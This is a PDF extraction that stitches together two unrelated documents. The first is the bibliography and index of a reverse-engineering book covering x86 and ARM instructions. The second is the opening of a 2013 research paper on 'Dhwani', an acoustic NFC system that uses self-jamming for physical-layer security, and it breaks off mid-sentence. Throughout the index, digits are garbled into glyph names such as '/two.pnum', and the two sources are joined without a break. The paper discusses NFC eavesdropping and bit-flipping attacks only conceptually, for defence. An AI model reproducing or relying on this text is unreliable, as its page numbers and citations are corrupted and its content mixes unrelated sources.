/two.pnum/five.pnum/nine.pnum
Bibliography
[App/one.pnum/zero.pnum] Apple. iOSABIFunction CallGuide. /two.pnum/zero.pnum/one.pnum/zero.pnum. Also available as http://developer.apple.com/library/
ios/documentation/Xcode/Conceptual/iPhoneOSABIReference/iPhoneOSABIReference.pdf .
[Cli] Marshall Cline. C++ faq. Also available as http://www.parashift.com/c++-faq-lite/index.html .
[ISO/zero.pnum/seven.pnum] ISO. ISO/IEC /nine.pnum/eight.pnum/nine.pnum/nine.pnum:TC/three.pnum (CC/nine.pnum/nine.pnum standard). /two.pnum/zero.pnum/zero.pnum/seven.pnum. Also available as http://www.open-std.org/jtc1/
sc22/WG14/www/docs/n1256.pdf .
[ISO/one.pnum/three.pnum] ISO. ISO/IEC /one.pnum/four.pnum/eight.pnum/eight.pnum/two.pnum:/two.pnum/zero.pnum/one.pnum/one.pnum (C++ /one.pnum/one.pnumstandard). /two.pnum/zero.pnum/one.pnum/three.pnum. Also available as http://www.open-std.org/jtc1/
sc22/wg21/docs/papers/2013/n3690.pdf .
[Ker/eight.pnum/eight.pnum] Brian W. Kernighan. TheCProgramming Language. Prentice Hall Professional Technical Reference, /two.pnumnd
edition, /one.pnum/nine.pnum/eight.pnum/eight.pnum.
[Knu/nine.pnum/eight.pnum] Donald E. Knuth. TheArtofComputer Programming Volumes /one.pnum-/three.pnumBoxed Set. Addison-Wesley Longman
Publishing Co., Inc., Boston, MA, USA, /two.pnumnd edition, /one.pnum/nine.pnum/nine.pnum/eight.pnum.
[Loh/one.pnum/zero.pnum] Eugene Loh. The ideal hpc programming language. Queue, /eight.pnum(/six.pnum):/three.pnum/zero.pnum:/three.pnum/zero.pnum–/three.pnum/zero.pnum:/three.pnum/eight.pnum, June /two.pnum/zero.pnum/one.pnum/zero.pnum.
[Ltd/nine.pnum/four.pnum] Advanced RISC Machines Ltd. TheARM Cookbook. /one.pnum/nine.pnum/nine.pnum/four.pnum. Also available as http://yurichev.com/ref/
ARM%20Cookbook%20(1994) .
[Ray/zero.pnum/three.pnum] Eric S. Raymond. The ArtofUNIX Programming. Pearson Education, /two.pnum/zero.pnum/zero.pnum/three.pnum. Also available as http:
//catb.org/esr/writings/taoup/html/ .
[Rit/eight.pnum/six.pnum] Dennis M. Ritchie. Where did ++ come from? (net.lang.c). http://yurichev.com/mirrors/c_dmr_
postincrement.txt , /one.pnum/nine.pnum/eight.pnum/six.pnum. [Online; accessed /two.pnum/zero.pnum/one.pnum/three.pnum].
[Rit/nine.pnum/three.pnum] Dennis M. Ritchie. The development of the c language. SIGPLAN Not., /two.pnum/eight.pnum(/three.pnum):/two.pnum/zero.pnum/one.pnum–/two.pnum/zero.pnum/eight.pnum, March
/one.pnum/nine.pnum/nine.pnum/three.pnum. Also available as http://yurichev.com/mirrors/dmr-The%20Development%20of%20the%20C%
20Language-1993.pdf .
[War/zero.pnum/two.pnum] Henry S. Warren. Hacker’s Delight. Addison-Wesley Longman Publishing Co., Inc., Boston, MA, USA, /two.pnum/zero.pnum/zero.pnum/two.pnum.
/two.pnum/six.pnum/zero.pnum
Index
C language elements
Pointers, /one.pnum/eight.pnum, /two.pnum/zero.pnum, /two.pnum/nine.pnum, /one.pnum/three.pnum/three.pnum, /one.pnum/four.pnum/seven.pnum
Post-decrement, /five.pnum/three.pnum
Post-increment, /five.pnum/three.pnum
Pre-decrement, /five.pnum/three.pnum
Pre-increment, /five.pnum/three.pnum
alloca(), /one.pnum/zero.pnum, /seven.pnum/nine.pnum
assert(), /one.pnum/six.pnum/nine.pnum
C/nine.pnum/nine.pnum
bool, /eight.pnum/two.pnum
restrict, /one.pnum/five.pnum/four.pnum
variable length arrays, /seven.pnum/nine.pnum
calloc(), /two.pnum/zero.pnum/four.pnum
const, /two.pnum, /two.pnum/two.pnum
for, /four.pnum/four.pnum, /nine.pnum/three.pnum
if, /three.pnum/one.pnum, /three.pnum/six.pnum
longjmp(), /three.pnum/seven.pnum
malloc(), /nine.pnum/eight.pnum
memcmp(), /one.pnum/six.pnum/nine.pnum
memcpy(), /one.pnum/eight.pnum
memset(), /two.pnum/four.pnum/four.pnum
qsort(), /one.pnum/three.pnum/three.pnum
restrict, /one.pnum/five.pnum/four.pnum
return, /three.pnum, /two.pnum/three.pnum, /two.pnum/eight.pnum
scanf, /one.pnum/eight.pnum
strlen(), /four.pnum/nine.pnum, /one.pnum/four.pnum/three.pnum
switch, /three.pnum/five.pnum–/three.pnum/seven.pnum
tolower(), /two.pnum/one.pnum/zero.pnum
while, /four.pnum/nine.pnum
Compiler’s anomalies, /eight.pnum/eight.pnum, /two.pnum/four.pnum/nine.pnum
grep usage, /six.pnum/eight.pnum, /one.pnum/six.pnum/eight.pnum, /one.pnum/seven.pnum/zero.pnum, /one.pnum/seven.pnum/two.pnum, /two.pnum/three.pnum/three.pnum
Dynamically loaded libraries, /seven.pnum
Global variables, /two.pnum/zero.pnum
Linker, /two.pnum/two.pnum, /one.pnum/one.pnum/five.pnum
RISC pipeline, /three.pnum/four.pnum
Non-a-numbers (NaNs), /six.pnum/five.pnum
Buffer overflow, /seven.pnum/five.pnum
Out-of-order execution, /one.pnum/six.pnum
position-independent code, /four.pnum, /one.pnum/six.pnum/five.pnum
RAM, /two.pnum/two.pnum
ROM, /two.pnum/two.pnum
Recursion, /eight.pnum, /one.pnum/five.pnum/nine.pnum
Tail recursion, /one.pnum/five.pnum/nine.pnum
Stack, /eight.pnum, /two.pnum/five.pnum, /three.pnum/six.pnumStack overflow, /eight.pnum
Stack frame, /one.pnum/nine.pnum
Syntactic Sugar, /three.pnum/six.pnum, /one.pnum/zero.pnum/two.pnum
iPod/iPhone/iPad, /four.pnum
/eight.pnum/zero.pnum/eight.pnum/zero.pnum, /five.pnum/two.pnum
Angry Birds, /six.pnum/eight.pnum
ARM, /five.pnum/two.pnum
ARM mode, /four.pnum
Pipeline, /four.pnum/two.pnum
Mode switching, /two.pnum/seven.pnum, /four.pnum/three.pnum
Adressing modes, /five.pnum/three.pnum
mode switching, /seven.pnum
Instructions
ADD, /six.pnum, /three.pnum/three.pnum, /four.pnum/seven.pnum, /five.pnum/five.pnum, /nine.pnum/one.pnum
ADDAL, /three.pnum/three.pnum
ADDCC, /four.pnum/one.pnum
ADDS, /two.pnum/seven.pnum, /three.pnum/seven.pnum
ADR, /four.pnum, /three.pnum/three.pnum
ADREQ, /three.pnum/three.pnum, /three.pnum/seven.pnum
ADRGT, /three.pnum/three.pnum
ADRHI, /three.pnum/three.pnum
ADRNE, /three.pnum/seven.pnum
ASRS, /five.pnum/six.pnum, /eight.pnum/eight.pnum
B, /one.pnum/three.pnum, /three.pnum/three.pnum, /three.pnum/four.pnum
BCS, /three.pnum/four.pnum, /six.pnum/nine.pnum
BEQ, /two.pnum/four.pnum, /three.pnum/seven.pnum
BGE, /three.pnum/four.pnum
BIC, /eight.pnum/seven.pnum
BL, /five.pnum, /seven.pnum, /three.pnum/three.pnum
BLE, /three.pnum/four.pnum
BLEQ, /three.pnum/three.pnum
BLGT, /three.pnum/three.pnum
BLHI, /three.pnum/three.pnum
BLS, /three.pnum/four.pnum
BLT, /four.pnum/seven.pnum
BLX, /seven.pnum
BNE, /three.pnum/four.pnum
BX, /two.pnum/seven.pnum, /four.pnum/three.pnum
CMP, /two.pnum/four.pnum, /three.pnum/three.pnum, /three.pnum/seven.pnum, /four.pnum/one.pnum, /four.pnum/seven.pnum, /nine.pnum/one.pnum
IDIV, /five.pnum/four.pnum
IT, /six.pnum/seven.pnum, /seven.pnum/eight.pnum
LDMCSFD, /three.pnum/three.pnum
LDMEA, /eight.pnum
/two.pnum/six.pnum/one.pnum
LDMED, /eight.pnum
LDMFA, /eight.pnum
LDMFD, /five.pnum, /eight.pnum, /three.pnum/three.pnum
LDMGEFD, /three.pnum/three.pnum
LDR, /one.pnum/five.pnum, /two.pnum/zero.pnum, /seven.pnum/two.pnum
LDR.W, /eight.pnum/one.pnum
LDRB, /one.pnum/zero.pnum/six.pnum
LDRB.W, /five.pnum/three.pnum
LDRSB, /five.pnum/two.pnum
LSL, /nine.pnum/one.pnum
LSL.W, /nine.pnum/one.pnum
LSLS, /seven.pnum/three.pnum
MLA, /two.pnum/seven.pnum
MOV, /five.pnum, /five.pnum/five.pnum, /nine.pnum/one.pnum
MOVT, /six.pnum, /five.pnum/five.pnum
MOVT.W, /seven.pnum
MOVW, /seven.pnum
MULS, /two.pnum/seven.pnum
MVNS, /five.pnum/three.pnum
ORR, /eight.pnum/seven.pnum
POP, /four.pnum, /five.pnum, /eight.pnum, /nine.pnum
PUSH, /eight.pnum, /nine.pnum
RSB, /eight.pnum/one.pnum, /nine.pnum/one.pnum
SMMUL, /five.pnum/five.pnum
STMEA, /eight.pnum
STMED, /eight.pnum
STMFA, /eight.pnum, /one.pnum/six.pnum
STMFD, /four.pnum, /eight.pnum
STMIA, /one.pnum/five.pnum
STMIB, /one.pnum/six.pnum
STR, /one.pnum/four.pnum, /seven.pnum/two.pnum
SUB, /one.pnum/four.pnum, /eight.pnum/one.pnum, /nine.pnum/one.pnum
SUBEQ, /five.pnum/three.pnum
SXTB, /one.pnum/zero.pnum/six.pnum
TEST, /five.pnum/zero.pnum
TST, /eight.pnum/five.pnum, /nine.pnum/one.pnum
VADD, /five.pnum/nine.pnum
VDIV, /five.pnum/nine.pnum
VLDR, /five.pnum/nine.pnum
VMOV, /five.pnum/nine.pnum, /six.pnum/seven.pnum
VMOVGT, /six.pnum/seven.pnum
VMRS, /six.pnum/seven.pnum
VMUL, /five.pnum/nine.pnum
Registers
APSR, /six.pnum/seven.pnum
FPSCR, /six.pnum/seven.pnum
Link Register, /five.pnum, /nine.pnum, /one.pnum/three.pnum, /four.pnum/three.pnum
R/zero.pnum, /two.pnum/eight.pnum
scratch registers, /five.pnum/two.pnum
Z, /two.pnum/four.pnum
thumb mode, /four.pnum, /three.pnum/four.pnum, /four.pnum/three.pnum
thumb-/two.pnum mode, /four.pnum, /four.pnum/three.pnum, /six.pnum/seven.pnum, /six.pnum/eight.pnum
armel, /six.pnum/zero.pnum
armhf, /six.pnum/zero.pnumCondition codes, /three.pnum/three.pnum
D-registers, /five.pnum/nine.pnum
Data processing instructions, /five.pnum/five.pnum
DCB, /five.pnum
hard float, /six.pnum/zero.pnum
if-then block, /six.pnum/seven.pnum
Leaf function, /nine.pnum
Optional operators
ASR, /five.pnum/five.pnum, /nine.pnum/one.pnum
LSL, /seven.pnum/two.pnum, /eight.pnum/one.pnum, /nine.pnum/one.pnum
LSR, /five.pnum/five.pnum, /nine.pnum/one.pnum
ROR, /nine.pnum/one.pnum
RRX, /nine.pnum/one.pnum
S-registers, /five.pnum/nine.pnum
so/f_t float, /six.pnum/zero.pnum
BASIC
POKE, /one.pnum/seven.pnum/two.pnum
C++, /two.pnum/three.pnum/five.pnum
References, /three.pnum/zero.pnum
Callbacks, /one.pnum/three.pnum/three.pnum
Canary, /seven.pnum/seven.pnum
cdecl, /one.pnum/two.pnum, /one.pnum/six.pnum/three.pnum
column-major order, /seven.pnum/nine.pnum
Compiler intrinsic, /one.pnum/zero.pnum
CRC/three.pnum/two.pnum, /nine.pnum/one.pnum
DES, /one.pnum/three.pnum/seven.pnum, /one.pnum/four.pnum/seven.pnum
DosBox, /one.pnum/seven.pnum/two.pnum
double, /five.pnum/seven.pnum, /one.pnum/six.pnum/four.pnum
ELF, /two.pnum/one.pnum
Error messages, /one.pnum/six.pnum/nine.pnum
fastcall, /eight.pnum/three.pnum, /one.pnum/six.pnum/three.pnum
float, /five.pnum/seven.pnum, /one.pnum/one.pnum/one.pnum, /one.pnum/six.pnum/four.pnum
FORTRAN, /seven.pnum/nine.pnum, /one.pnum/five.pnum/four.pnum
Function epilogue, /one.pnum/three.pnum, /one.pnum/five.pnum, /three.pnum/three.pnum, /one.pnum/zero.pnum/six.pnum, /one.pnum/five.pnum/nine.pnum, /one.pnum/seven.pnum/one.pnum
Function prologue, /three.pnum, /nine.pnum, /one.pnum/four.pnum, /seven.pnum/seven.pnum, /one.pnum/five.pnum/nine.pnum, /one.pnum/seven.pnum/one.pnum
Fused multiply–add, /two.pnum/seven.pnum
GDB, /seven.pnum/six.pnum
IDA
var_?, /one.pnum/five.pnum, /two.pnum/zero.pnum
IEEE /seven.pnum/five.pnum/four.pnum, /five.pnum/seven.pnum, /one.pnum/one.pnum/one.pnum, /one.pnum/three.pnum/one.pnum
Inline code, /four.pnum/eight.pnum, /eight.pnum/seven.pnum, /one.pnum/two.pnum/zero.pnum
Intel C++, /two.pnum, /one.pnum/three.pnum/seven.pnum, /two.pnum/four.pnum/nine.pnum
jumptable, /three.pnum/nine.pnum, /four.pnum/three.pnum
Keil, /four.pnum
Linux, /two.pnum/three.pnum/five.pnum
libc.so./six.pnum, /eight.pnum/three.pnum, /one.pnum/three.pnum/six.pnum
LLVM, /four.pnum
/two.pnum/six.pnum/two.pnum
long double, /five.pnum/seven.pnum
Loop unwinding, /four.pnum/six.pnum
MD/five.pnum, /one.pnum/six.pnum/nine.pnum
MIDI, /one.pnum/six.pnum/nine.pnum
Name mangling, /one.pnum/one.pnum/five.pnum
objdump, /one.pnum/six.pnum/six.pnum
Oracle RDBMS, /two.pnum, /one.pnum/three.pnum/seven.pnum, /one.pnum/six.pnum/nine.pnum, /two.pnum/three.pnum/five.pnum, /two.pnum/four.pnum/three.pnum, /two.pnum/four.pnum/five.pnum, /two.pnum/four.pnum/nine.pnum
Page (memory), /one.pnum/four.pnum/five.pnum
PDB, /one.pnum/six.pnum/eight.pnum, /two.pnum/three.pnum/two.pnum
PDP-/one.pnum/one.pnum, /five.pnum/three.pnum
puts() instead of printf(), /six.pnum, /two.pnum/zero.pnum, /three.pnum/two.pnum
Raspberry Pi, /six.pnum/zero.pnum
Register allocation, /one.pnum/four.pnum/seven.pnum
Relocation, /seven.pnum
row-major order, /seven.pnum/nine.pnum
RTTI, /one.pnum/three.pnum/zero.pnum
SAP, /one.pnum/six.pnum/eight.pnum, /two.pnum/three.pnum/two.pnum
Signed numbers, /three.pnum/two.pnum, /one.pnum/six.pnum/two.pnum
stdcall, /one.pnum/six.pnum/three.pnum
this, /one.pnum/one.pnum/five.pnum
thiscall, /one.pnum/one.pnum/six.pnum, /one.pnum/six.pnum/four.pnum
ThumbTwoMode, /seven.pnum
thunk-functions, /seven.pnum
Unrolled loop, /four.pnum/eight.pnum, /seven.pnum/eight.pnum
Windows
KERNEL/three.pnum/two.pnum.DLL, /eight.pnum/two.pnum
MSVCR/eight.pnum/zero.pnum.DLL, /one.pnum/three.pnum/four.pnum
ntoskrnl.exe, /two.pnum/three.pnum/five.pnum
Structured Exception Handling, /one.pnum/one.pnum
x/eight.pnum/six.pnum
Instructions
ADD, /two.pnum, /one.pnum/two.pnum, /two.pnum/six.pnum
AND, /three.pnum, /eight.pnum/two.pnum, /eight.pnum/six.pnum, /eight.pnum/eight.pnum, /one.pnum/one.pnum/zero.pnum
BSF, /one.pnum/four.pnum/six.pnum
CALL, /two.pnum, /eight.pnum
CMOVcc, /three.pnum/four.pnum
CMP, /two.pnum/three.pnum, /two.pnum/four.pnum
CMPSB, /one.pnum/six.pnum/nine.pnum
CPUID, /one.pnum/zero.pnum/seven.pnum
DEC, /five.pnum/one.pnum
DIVSD, /one.pnum/seven.pnum/one.pnum
FADDP, /five.pnum/eight.pnum, /five.pnum/nine.pnum
FCOM, /six.pnum/four.pnum, /six.pnum/five.pnum
FCOMP, /six.pnum/three.pnum
FDIV, /five.pnum/eight.pnum, /one.pnum/seven.pnum/zero.pnum
FDIVP, /five.pnum/eight.pnum
FDIVR, /five.pnum/nine.pnumFLD, /six.pnum/one.pnum, /six.pnum/three.pnum
FMUL, /five.pnum/eight.pnum
FNSTSW, /six.pnum/three.pnum, /six.pnum/six.pnum
FSTP, /six.pnum/one.pnum
FUCOM, /six.pnum/five.pnum
FUCOMPP, /six.pnum/five.pnum
IMUL, /two.pnum/six.pnum
INC, /five.pnum/one.pnum
JA, /three.pnum/two.pnum, /one.pnum/six.pnum/two.pnum
JAE, /three.pnum/two.pnum
JB, /three.pnum/two.pnum, /one.pnum/six.pnum/two.pnum
JBE, /three.pnum/two.pnum
JE, /three.pnum/six.pnum
JG, /three.pnum/two.pnum, /one.pnum/six.pnum/two.pnum
JGE, /three.pnum/two.pnum
JL, /three.pnum/two.pnum, /one.pnum/six.pnum/two.pnum
JLE, /three.pnum/two.pnum
JMP, /eight.pnum, /one.pnum/three.pnum
JNBE, /six.pnum/six.pnum
JNE, /two.pnum/three.pnum, /two.pnum/four.pnum, /three.pnum/two.pnum
JP, /six.pnum/three.pnum
JZ, /two.pnum/four.pnum, /three.pnum/six.pnum, /two.pnum/four.pnum/nine.pnum
LEA, /one.pnum/nine.pnum, /nine.pnum/four.pnum, /one.pnum/zero.pnum/zero.pnum, /one.pnum/five.pnum/eight.pnum
LEAVE, /three.pnum
LOOP, /four.pnum/four.pnum, /one.pnum/seven.pnum/one.pnum
MOV, /three.pnum
MOVDQA, /one.pnum/four.pnum/zero.pnum
MOVDQU, /one.pnum/four.pnum/zero.pnum
MOVSD, /two.pnum/zero.pnum/nine.pnum
MOVSX, /four.pnum/nine.pnum, /five.pnum/two.pnum, /one.pnum/zero.pnum/six.pnum
MOVZX, /five.pnum/zero.pnum, /nine.pnum/eight.pnum
NOP, /nine.pnum/four.pnum, /one.pnum/six.pnum/zero.pnum
NOT, /five.pnum/one.pnum, /five.pnum/three.pnum, /two.pnum/one.pnum/three.pnum
OR, /eight.pnum/six.pnum
PADDD, /one.pnum/four.pnum/zero.pnum
PCMPEQB, /one.pnum/four.pnum/five.pnum
PLMULHW, /one.pnum/three.pnum/seven.pnum
PLMULLD, /one.pnum/three.pnum/seven.pnum
PMOVMSKB, /one.pnum/four.pnum/five.pnum
POP, /two.pnum, /eight.pnum
PUSH, /two.pnum, /three.pnum, /eight.pnum, /one.pnum/nine.pnum
PXOR, /one.pnum/four.pnum/five.pnum
RCL, /one.pnum/seven.pnum/one.pnum
RET, /three.pnum, /eight.pnum, /seven.pnum/seven.pnum, /one.pnum/one.pnum/six.pnum
SAHF, /six.pnum/five.pnum
SETcc, /six.pnum/six.pnum
SETNBE, /six.pnum/six.pnum
SETNZ, /five.pnum/zero.pnum
SHL, /seven.pnum/one.pnum, /eight.pnum/eight.pnum, /nine.pnum/zero.pnum
SHR, /nine.pnum/zero.pnum, /one.pnum/one.pnum/zero.pnum
SUB, /three.pnum, /two.pnum/four.pnum, /three.pnum/six.pnum
TEST, /four.pnum/nine.pnum, /eight.pnum/two.pnum, /eight.pnum/five.pnum
XOR, /three.pnum, /two.pnum/three.pnum, /five.pnum/one.pnum
Registers
/two.pnum/six.pnum/three.pnum
Flags, /two.pnum/four.pnum
Parity flag, /six.pnum/three.pnum
EAX, /two.pnum/three.pnum, /two.pnum/eight.pnum
EBP, /one.pnum/nine.pnum, /two.pnum/five.pnum
ECX, /one.pnum/one.pnum/five.pnum
ESP, /one.pnum/two.pnum, /one.pnum/nine.pnum
JMP, /four.pnum/zero.pnum
RIP, /one.pnum/six.pnum/six.pnum
ZF, /two.pnum/four.pnum, /eight.pnum/two.pnum
/eight.pnum/zero.pnum/eight.pnum/six.pnum, /five.pnum/two.pnum, /eight.pnum/seven.pnum
/eight.pnum/zero.pnum/three.pnum/eight.pnum/six.pnum, /eight.pnum/seven.pnum
/eight.pnum/zero.pnum/four.pnum/eight.pnum/six.pnum, /five.pnum/seven.pnum
AVX, /one.pnum/three.pnum/seven.pnum
MMX, /one.pnum/three.pnum/seven.pnum
SSE, /one.pnum/three.pnum/seven.pnum
SSE/two.pnum, /one.pnum/three.pnum/seven.pnum
x/eight.pnum/six.pnum-/six.pnum/four.pnum, /one.pnum/eight.pnum, /one.pnum/four.pnum/seven.pnum, /one.pnum/six.pnum/six.pnum
Xcode, /four.pnum
/two.pnum/six.pnum/four.pnumDhwani : Secure Peer-to-Peer Acoustic NFC
Rajalakshmi Nandakumar, Krishna Kant Chintalapudi, Venkata N. Padmanabhan,
Ramarathnam Venkatesan
Microsoft Research India
ABSTRACT
Near Field Communication (NFC) enables physically proximate
devices to communicate over very short ranges in a peer-to-peer
manner without incurring complex network configuration overheads.
However, adoption of NFC-enabled applications has been stymied
by the low levels of penetration of NFC hardware.
In this paper, we address the challenge of enabling NFC-like
capability on the existing base of mobile phones. To this end,
we develop Dhwani , a novel, acoustics-based NFC system that
uses the microphone and speakers on mobile phones, thus elimi-
nating the need for any specialized NFC hardware. A key feature
of Dhwani is the JamSecure technique, which uses self-jamming
coupled with self-interference cancellation at the receiver, to pro-
vide an information-theoretically secure communication channel
between the devices. Our current implementation of Dhwani achieves
data rates of up to 2.4 Kbps, which is sufficient for most existing
NFC applications.
Categories and Subject Descriptors
C.2.m [ Computer Systems Organization ]: COMPUTER - COM-
MUNICATION NETWORKS— Miscellaneous
Keywords
NFC, Wireless, Security
1. INTRODUCTION
Near-Field Communication (NFC) enables low data rate, bidi-
rectional communication between devices within close proximity,
usually within a few centimeters, in a peer-to-peer manner. The key
advantage of NFC is that it eliminates the need for cumbersome
network configuration efforts required to set up a communication
channel using alternatives such as Bluetooth or WiFi. This is due
to its inherent property of association by physical proximity — if
two devices can communicate using NFC, then it implies that they
must be co-located. As an example, using an NFC enabled mobile
phone, a user can make payments by simply bringing the phone
close to a reader at the checkout counter, without having to first
identify the reader or connect to it.
Permission to make digital or hard copies of all or part of this work for
personal or classroom use is granted without fee provided that copies are not
made or distributed for profit or commercial advantage and that copies bear
this notice and the full citation on the first page. Copyrights for components
of this work owned by others than ACM must be honored. Abstracting with
credit is permitted. To copy otherwise, or republish, to post on servers or to
redistribute to lists, requires prior specific permission and/or a fee. Request
permissions from permissions@acm.org.
SIGCOMM’13, August 12–16, 2013, Hong Kong, China.
Copyright 2013 ACM 978-1-4503-2056-6/13/08 ...$15.00.Several NFC-based applications have been proposed or demon-
strated, e.g., contact-less payment, access control, social network-
ing, ticketing, museum services, etc. In many cases, NFC is used
to automatically initiate and set up a high data rate communica-
tion channel such as WiFi or Bluetooth. However, the adoption
of these applications has been stymied by the low levels of pen-
etration of NFC hardware, estimated to be just 3-5% [11] among
mobile phones worldwide and only about 12% [10] even in an ad-
vanced market such as the U.S., as of 2012. Even as far out as
2016, the penetration is expected to be under 50%. Correspond-
ingly, the prevalence of NFC-enabled point-of-sale (POS) terminals
is also low — under 5% today and expected to rise to only about
49% globally by 2017 [9]. Even disregarding the optimism that
usually colours such forecasts, it seems likely that the majority of
phones and POS terminals globally will notbe NFC-enabled even
3-4 years from now. Thus, the opportunities for using NFC appli-
cations such as peer-to-peer transfers or contact-less payments will
remain rather limited.
Can we enable NFC-like functionality on today’s devices? We
answer this question in the affirmative by presenting Dhwani , a
novel, acoustics-based system that uses the existing microphones
and speakers on phones to enable NFC, thus, eliminating the need
for specialized NFC hardware. As in conventional NFC, where
communication through magnetic coupling is confined to a short
range, acoustic communication in Dhwani is confined to a short
range (few cm). Thus, similar to conventional NFC, Dhwani en-
ables the “association by proximity” functionality needed for ap-
plications such as P2P transfers and contact-less payments.
A key advantage of Dhwani over conventional NFC is that it is a
purely software-based solution, that can run on legacy phones , in-
cluding feature phones, so long as they have a speaker and a micro-
phone. Consequently, much of the installed base of phones today
could use Dhwani to perform P2P NFC communication. That said,
the use of acoustic communication means that, unlike conventional
NFC, Dhwani is notamenable to implementation in passive tags.
A second significant advantage of Dhwani over conventional NFC
is in terms of information-theoretic, physical-layer security. As dis-
cussed in Section 3.1, the security model in Dhwani is that the de-
vices seeking to communicate are trusted and immune to tamper-
ing. However, in their midst might be one or more eavesdroppers.
Conventional NFC does not incorporate any security at the physical
or MAC layers since the short range of communication (about 10
cm) is in itself presumed to offer a degree of protection. However,
in [16], the authors demonstrate that it is possible to snoop on NFC
communications from a distance of 20-30 cm using an oscilloscope
and a standard tag antenna. The authors also conjecture that with a
more sophisticated sniffer antenna, such snooping should be possi-
ble from a distance of a meter or more.
Dhwani provides security at the physical layer using a novel self-
jamming technique, JamSecure , wherein the receiver intentionally
jams the signal it is trying to receive, thereby stymying eaves-
droppers, but then uses self-interference cancellation to success-
fully decode the incoming message. The security thus obtained is
information-theoretic, i.e., Dhwani inherently prevents the leakage
of information to an eavesdropper. This is in contrast to crypto-
graphic security, which is based on assumptions about computa-
tional hardness. Even if cryptographic security protocols are em-
ployed at the higher layers, Dhwani enables key exchange without
the need for any shared secret or certificates to be set up a priori.
This is a significant advantage, since creating a public key infras-
tructure (PKI) spanning billions of devices would be challenging.
In order to enable Dhwani we implemented an Acoustic Soft-
ware Defined Radio (ASDR) on the mobile devices that uses speak-
ers and microphones to receive and transmit data. Our ASDR de-
sign had to address several challenges unique to the nature of the
acoustic signal propagation and speaker-microphone characteris-
tics. For example, we found the gain of the speaker-microphone
combination in phones to be extremely non-uniform across the range
of frequencies (frequency selectivity), presumably due to the me-
chanical properties of their electro-mechanical parts ( e.g.,vibrating
membranes). Further, the high degree of ringing in the acoustic
channel (reverberations), compared to Radio Frequency (RF), ren-
dered the existing RF self-interference cancellation techniques in-
adequate. Consequently, for Dhwani, we present a novel and effi-
cient technique for self-interference cancellation, which takes ad-
vantage of the fact that the jamming sequence can be predetermined
by the receiver.
We present the design and implementation of Dhwani, an anal-
ysis of its security properties, and an experimental evaluation on
mobile devices such as phones and laptops. To sum up, the main
contributions of our work are
•A characterization of the acoustic hardware and environment in
the context of mobile phones.
•An Acoustic Software Defined Radio suitable for operation on
mobile phones.
•The JamSecure self-jamming technique for providing information-
theoretic, physical-layer security.
2. AN NFC PRIMER
As described in Section 1, NFC enables configuration-free low
data rate communication between two devices in close physical
proximity. NFC standards (ISO/IEC 18092/ECMA-340, NFC IP-
1, ISO/IEC 14443) have evolved from RFID technology. However,
while RFID readers can read tags up to distances of a few meters,
NFC readers are designed to read at distances of a few centimeters.
NFC devices can operate either in an active mode, in which the
device (e.g., a reader) generates its own electromagnetic field, or in
apassive mode, in which the device (e.g., a tag) is powered by the
electromagnetic field generated by another device in its proximity.
There are three modes of NFC interaction available for a mobile
device such as a phone:
•Read/Write: An NFC-enabled phone, operating in active mode,
can Read/Write data from/to a passive tag.
•Peer-to-Peer (P2P): Two NFC-enabled phones, each operating
in active mode, can exchange data.
•Card Emulation: An NFC-enabled phone can emulate a smart
card, allowing an active reader to read from it.
In this paper, we limit ourselves to the P2P mode of NFC.
How NFC works. Current day NFC technology works on the prin-ciple of magnetic induction. Each NFC device is equipped with an
antenna coil. Typically, one of the devices initiates communication
by passing a current through its antenna coil. This current gener-
ates a magnetic field, which then induces current in the receiving
device’s antenna coil. Thus, the two devices essentially form an
air-core transformer. Data is transmitted by modulating the current
passed through the transmitter coil.
Existing NFC standards employ Amplitude Shift Keying (ASK)
in the 13.56 MHz spectrum, with a bandwidth of about 1.8 MHz.
Three different data rates are supported: 106, 212 and 424 Kbps.
Typically, Manchester coding with 10% modulation is used, imply-
ing that the low and high amplitudes are 10% off on either side of
the carrier amplitude.
NFC is intended only for small data transfers; e.g., NFC tags are
typically equipped with a memory size of 96 to 512 bytes. Often,
when a large amount of data needs to be transferred, NFC is only
used to set up the initial connection for a higher data rate standard
such as Bluetooth or WiFi. Instant user gratification is an impor-
tant requirement of NFC, so the communication delay should not
exceed a few seconds.
Security in NFC. The air interface and data link layer for NFC
does not include any provision for security (NFCIP-1 [4]), with
information being transmitted in the clear. For the P2P mode of
NFC, newer security standards, layered on top of the data link layer,
have been defined. NFC-SEC [7] defines the framework for secu-
rity services, including a shared secret service and a secure channel
service. The actual security protocols are specified in NFC-SEC-
01 [6], including Elliptic Curves Diffie-Hellman (ECDH) for key
agreement and the AES algorithm for data encryption and integrity.
However, as noted in [5], NFC-SEC-01 does not protect against
man-in-the-middle attacks because no entity authentication can be
provided when the peer NFC devices do not share any secret a
priori. It is further noted that the practical risk of a man-in-the-
middle attack is low due to the short operating distance, but that
users should be aware of and carefully evaluate the potential vul-
nerability in their setting.
The authors in [13] discuss various attacks, including eavesdrop-
ping and data modification, that could be mounted on NFC at the
physical layer. They report eavesdropping ranges of 1m and 10m,
respectively, for the passive and active modes. Furthermore, an at-
tacker can perform data modification (particularly with the 10%
modulation that is commonly employed) by injecting signal en-
ergy during a “low” period to make the corresponding amplitude
higher than in the following “high” period, thereby flipping the cor-
responding bit.
Compared to the NFC security enhancements, such as NFC-
SEC-01, the physical-layer security provided by Dhwani avoids
the possibility of man-in-the-middle attacks by allowing the peers
to securely establish a secret without requiring any a priori shared
secret or third-party communication.
3. DHWANI - THE KEY IDEAS
The goal of Dhwani is to enable NFC-like functionality, i.e.,
configuration-free short-range communication, in a wide array of
existing mobile devices, while also ensuring physical-layer secu-
rity. In this section, we present an overview of Dhwani highlighting
the key novel aspects.
3.1 Security Model in Dhwani
The security goal of Dhwani is to ensure the secrecy and integrity
of messages exchanged between a transmitter and receiver pair lo-
cated within close proximity (a few centimeters), in the presence of
attackers. In this section we make the following assumptions about
Dhwani’s operation and security model:
•Both transacting devices (transmitter and receiver) are trusted
entities. These devices are assumed to function correctly and
execute the Dhwani protocol faithfully. Any failure is presumed
to be only accidental (e.g., due to a power outage).
•The attacker is presumed to be capable of mounting both pas-
sive (e.g., eavesdropping) and active attacks (e.g., message in-
sertion). However, we assume that the attacker is unable to di-
rectly tamper with the trusted entities or alter their functioning.
•The communication range of the transacting devices is limited
to a few centimeters.
The above assumptions are consistent with the NFC model, wherein
association, and the consequent transaction, happen implicitly through
physical proximity. So, for instance, users who swipe their NFC-
capable cards at a point-of-sale (POS) terminal are presumed to
have satisfied themselves about the authenticity of the POS termi-
nal, say based on its location in the check-out area of a reputable
store. The only concern would be the possibility of attackers lurk-
ing in the vicinity. Note that as discussed in Section 8, Dhwani’s
